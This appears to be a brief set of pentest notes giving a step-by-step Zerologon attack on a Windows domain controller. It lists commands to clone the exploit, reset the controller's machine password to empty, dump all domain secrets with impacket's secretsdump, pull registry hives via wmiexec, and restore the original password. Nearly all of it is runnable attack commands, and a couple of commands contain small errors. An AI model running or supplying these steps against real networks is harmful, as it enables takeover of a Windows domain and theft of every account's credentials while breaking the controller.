# Directly exploit the DC

Zerologon can be found here: https://github.com/risksense/zerologon

The process will overwrite the machine password directly on the box.
Once you auth with an empty hash you can dump secrets directly off the DC.

After you've got the hashes, reinstall the original DC machine password.

Crack the passwords offline with the same technique.

# Setup a venv
```
git clone https://github.com/risksense/zerologon
cd zerologon
python -m venv zerovenv
source zerovenv/
pip install impacket
pip install -r requirements.txt
```
# Run the exploits

`python3 set_empty_pw.py WINDC001 10.10.10.2`

This should work, resetting the machine pw

*** The DC will be broken at this point ***

`secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'MENDAWGS/WINDC001$@d10.10.10.2'`

This will dump all secrets like we had before.

Use `wmiexec.py` impacket script to connect to the DC with your local admin hash.

Then you can copy off the required hives using whatever method you like.

`secretsdump.py -sam sam.save -system system.save -security security.save LOCAL`

And that should show you the original NT hash of the machine account. You can then re-install that original machine account hash to the domain by

`python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH`


